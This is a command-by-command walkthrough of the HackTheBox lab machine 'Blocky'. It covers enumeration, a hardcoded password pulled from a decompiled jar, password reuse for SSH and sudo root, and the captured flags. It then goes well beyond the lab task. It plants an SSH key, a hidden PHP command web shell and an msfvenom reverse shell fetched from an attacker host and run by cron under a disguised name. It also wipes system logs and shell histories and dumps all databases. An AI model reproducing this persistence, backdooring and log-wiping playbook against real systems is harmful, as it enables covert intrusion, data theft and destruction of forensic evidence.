HackTheBox Blocky

$ nmap -sC -sV -A 10.10.10.37
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     ProFTPD 1.3.5a
22/tcp   open   ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp   open   http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos

# Directory enumeration
$ dirsearch -u http://10.10.10.37:80
[11:25:57] 301 -  315B  - /phpmyadmin  ->  http://10.10.10.37/phpmyadmin/
[11:25:58] 200 -   10KB - /phpmyadmin/
[11:25:58] 301 -  312B  - /plugins  ->  http://10.10.10.37/plugins/
[11:25:58] 200 -  745B  - /plugins/
[11:26:07] 200 -   0B  - /wp-config.php

# Download Java plugins
$ wget http://10.10.10.37/plugins/BlockyCore.jar
$ wget http://10.10.10.37/plugins/griefprevention-1.11.2-3.1.1.298.jar

# Analyze jar contents
$ jar -tf BlockyCore.jar
com/myfirstplugin/BlockyCore.class

$ jar -xf BlockyCore.jar

# Use Java decompiler (jd-gui, jadx, or online tools)
$ jd-gui BlockyCore.jar

public class BlockyCore {
    public String sqlHost = "localhost";
    public String sqlUser = "root";
    public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
    // Additional code...
}

# Login to phpMyAdmin using discovered credentials
# URL: http://10.10.10.37/phpmyadmin/
# Credentials: root:8YsqfCTnvxAUeduzjNSXe22

# Hash cracking attempts
$ echo '$P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/' > hash.txt
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Hash proves resistant to standard cracking

# Test database password for SSH access
$ ssh notch@10.10.10.37
notch@10.10.10.37's password: 8YsqfCTnvxAUeduzjNSXe22

notch@Blocky:~$ whoami
notch
notch@Blocky:~$ cat user.txt
59fee0977fb60b8a0bc6e41e751f3cd5

notch@Blocky:~$ sudo -l
[sudo] password for notch: 8YsqfCTnvxAUeduzjNSXe22
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

notch@Blocky:~$ sudo su
root@Blocky:/home/notch# whoami
root
root@Blocky:/home/notch# cat /root/root.txt
0a9694a5b4d272c694679f7860f1cd5f

# Generate SSH key pair
$ ssh-keygen -t rsa -b 4096 -f blocky_persistence

# Install as root
# mkdir -p /root/.ssh
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys

# Create PHP backdoor in WordPress theme
# cat > /var/www/html/wp-content/themes/twentyseventeen/.config.php << 'EOF'
<?php
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
EOF

# Access via: http://10.10.10.37/wp-content/themes/twentyseventeen/.config.php?cmd=id

# Create reverse shell payload
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f elf -o backdoor

# Install persistent cron job
# wget 10.10.14.6/backdoor -O /usr/bin/.minecraft-update
# chmod +x /usr/bin/.minecraft-update
# echo "*/20 * * * * /usr/bin/.minecraft-update" >> /etc/crontab

# Clear web server logs
# > /var/log/apache2/access.log
# > /var/log/apache2/error.log

# Clear system logs
# > /var/log/auth.log
# > /var/log/syslog
# > /var/log/wtmp
# > /var/log/lastlog

# Clear command histories
# > /root/.bash_history
# > /home/notch/.bash_history

# Clear MySQL logs
# > /var/log/mysql/error.log
# mysql -u root -p8YsqfCTnvxAUeduzjNSXe22 -e "RESET MASTER;"

# Discover Minecraft server infrastructure
# ss -tlnp | grep -E "(25565|25575)"

# Scan for internal services
# for port in 3306 6379 11211 27017; do nc -zv 127.0.0.1 $port 2>&1 | grep succeeded; done

# Extract WordPress configuration
# grep -r "DB_PASSWORD\|password" /var/www/html/wp-config.php

# Search for Minecraft server credentials
# find /opt -name "*.properties" -exec grep -l "password\|pass" {} \; 2>/dev/null

# Extract MySQL databases
# mysqldump -u root -p8YsqfCTnvxAUeduzjNSXe22 --all-databases > /tmp/mysql_dump.sql

# Check for running Minecraft servers
# ps aux | grep -i minecraft
# ps aux | grep java

# Examine server configurations
# find / -name "server.properties" 2>/dev/null
# find / -name "*.jar" -path "*/minecraft*" 2>/dev/null

# Test for anonymous FTP access
$ ftp 10.10.10.37
Connected to 10.10.10.37.
220 ProFTPD 1.3.5a Server (Debian)
Name (10.10.10.37:user): anonymous
331 Password required for anonymous
Password: 
530 Login incorrect.

# WordPress user enumeration
$ wpscan --url http://10.10.10.37 --enumerate u

# WordPress plugin enumeration
$ wpscan --url http://10.10.10.37 --enumerate p

# Using jadx for decompilation
$ jadx BlockyCore.jar

# Using javap for class analysis
$ javap -cp BlockyCore.jar com.myfirstplugin.BlockyCore

# Using strings for quick analysis
$ strings BlockyCore.jar | grep -E "(password|pass|sql)"

# Direct MySQL connection
$ mysql -h 10.10.10.37 -u root -p8YsqfCTnvxAUeduzjNSXe22

# Database enumeration
mysql> SHOW DATABASES;
mysql> USE wordpress;
mysql> SHOW TABLES;
mysql> SELECT * FROM wp_users;

# Transfer and run LinPEAS
notch@Blocky:/tmp$ wget 10.10.14.6/linpeas.sh
notch@Blocky:/tmp$ chmod +x linpeas.sh
notch@Blocky:/tmp$ ./linpeas.sh

# Find SUID binaries
notch@Blocky:/tmp$ find / -perm -4000 -type f 2>/dev/null

# Check for custom SUID binaries
notch@Blocky:/tmp$ ls -la /usr/local/bin/

# Check kernel version
notch@Blocky:/tmp$ uname -a
Linux Blocky 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017

# Search for applicable exploits
$ searchsploit linux kernel 4.4 | grep -i privilege